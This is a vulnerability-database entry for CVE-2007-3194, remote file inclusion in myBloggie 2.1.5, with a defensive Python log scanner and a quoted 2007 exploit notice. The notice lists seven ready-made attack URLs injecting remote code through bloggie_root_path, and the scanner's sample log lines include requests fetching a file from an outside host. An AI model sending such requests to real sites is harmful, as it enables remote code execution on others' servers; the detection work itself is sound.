myBloggie PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1190242    Vulnerability type: Unknown
Published: 2007-06-12    Updated: 2007-06-13
CVE ID: CVE-2007-3194    CNNVD ID: CNNVD-200706-206
Platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2007060055
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-206
|Vulnerability details
myBloggie PHP contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code via a URL supplied in the bloggie_root_path parameter of (1) config.php; (2) db.php, (3) template.php, (4) functions.php and (5) classes.php in includes/; and (6) viewmode.php and (7) blog_body.php.
|Exploit (EXP)
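As an added example (not part of this advisory or of myBloggie itself), the following Python snippet scans web-server access-log lines for requests that send a scheme-prefixed URL in bloggie_root_path to one of the seven affected scripts, which is what an attempt against this RFI looks like from the defender's side. The log lines, addresses and the /blog/ installation prefix are constructed for the example; the script names and parameter name come from the description above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The seven scripts the advisory names as taking bloggie_root_path from the request.
AFFECTED_SCRIPTS = (
    "config.php", "includes/db.php", "includes/template.php",
    "includes/functions.php", "includes/classes.php", "viewmode.php", "blog_body.php",
)

# Constructed Apache-style log lines (not real traffic); /blog/ prefix and addresses are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jun/2007:10:01:02 +0000] "GET /blog/index.php HTTP/1.1" 200 5120
203.0.113.7 - - [12/Jun/2007:10:02:15 +0000] "GET /blog/includes/db.php?bloggie_root_path=http://203.0.113.9/x.txt? HTTP/1.1" 200 312
203.0.113.7 - - [12/Jun/2007:10:02:40 +0000] "GET /blog/viewmode.php?bloggie_root_path=%68ttp%3A%2F%2F203.0.113.9%2Fx.txt%3F HTTP/1.1" 200 312
203.0.113.8 - - [12/Jun/2007:10:03:00 +0000] "GET /blog/config.php?bloggie_root_path=../../ HTTP/1.1" 200 100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_remote_include_value(value: str) -> bool:
    """True when the value starts with a URL scheme (http://, ftp://, data://, ...), which
    is what makes include() fetch it remotely. Decoding twice catches double-encoding."""
    decoded = unquote(unquote(value))
    return re.match(r"\s*[a-z][a-z0-9+.\-]*://", decoded, re.IGNORECASE) is not None

def find_rfi_attempts(log_text: str) -> list:
    """One dict per request that sends a scheme-prefixed bloggie_root_path to an
    affected script. Local traversal values (../../) are not RFI and are not flagged."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        script = parts.path.lstrip("/")
        # Match the script name under any installation prefix (/blog/ here).
        if not any(script == s or script.endswith("/" + s) for s in AFFECTED_SCRIPTS):
            continue
        # parse_qs URL-decodes each value once; is_remote_include_value decodes again.
        for value in parse_qs(parts.query, keep_blank_values=True).get("bloggie_root_path", []):
            if is_remote_include_value(value):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"), "script": script,
                             "value": unquote(value), "status": m.group("status")})
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["script"]} bloggie_root_path={hit["value"]}')
```

A 200 status on such a request is the signal to look for, since a patched or non-vulnerable script would not have fetched the remote resource; pair the match with the PHP allow_url_include / allow_url_fopen settings of the host when triaging.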
########################################################################
#
#  myBloggie 2.1.5 RFI
#
#  Author:  Yaser <yaser (at) gencturk (dot) net [email concealed]>
#
#  Homepage: http://www.ayyildiz.org
#
########################################################################

########################################################################
#
#  Download S : http://mywebland.com/download.php?id=19
#
#  Exploits:
#
#  http://site/config.php?bloggie_root_path=evilcode?
#  http://site/includes/db.php?bloggie_root_path=evilcode?
#  http://site/includes/template.php?bloggie_root_path=evilcode?
#  http://site/includes/functions.php?bloggie_root_path=evilcode?
#  http://site/includes/classes.php?bloggie_root_path=evilcode?
#  http://site/viewmode.php?bloggie_root_path=evilcode?
#  http://site/blog_body.php?bloggie_root_path=evilcode?
#
########################################################################

Thanks: H0tturk - ir4dex - ht08 - ajann - GencTurk - Zakix - Devil Hacker

Reference: www.h0tturk.com and Stefan Esser
|References

Source: BUGTRAQ
Name: 20070609 myBloggie 2.1.5 Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/470972/100/0/threaded
Source: OSVDB
Name: 37685
Link: http://osvdb.org/37685
Source: BUGTRAQ
Name: 20070610 Re: myBloggie 2.1.5 Remote File Include
Link: http://archives.neohapsis.com/archives/bugtraq/2007-06/0125.html
Source: SREASON
Name: 2794
Link: http://securityreason.com/securityalert/2794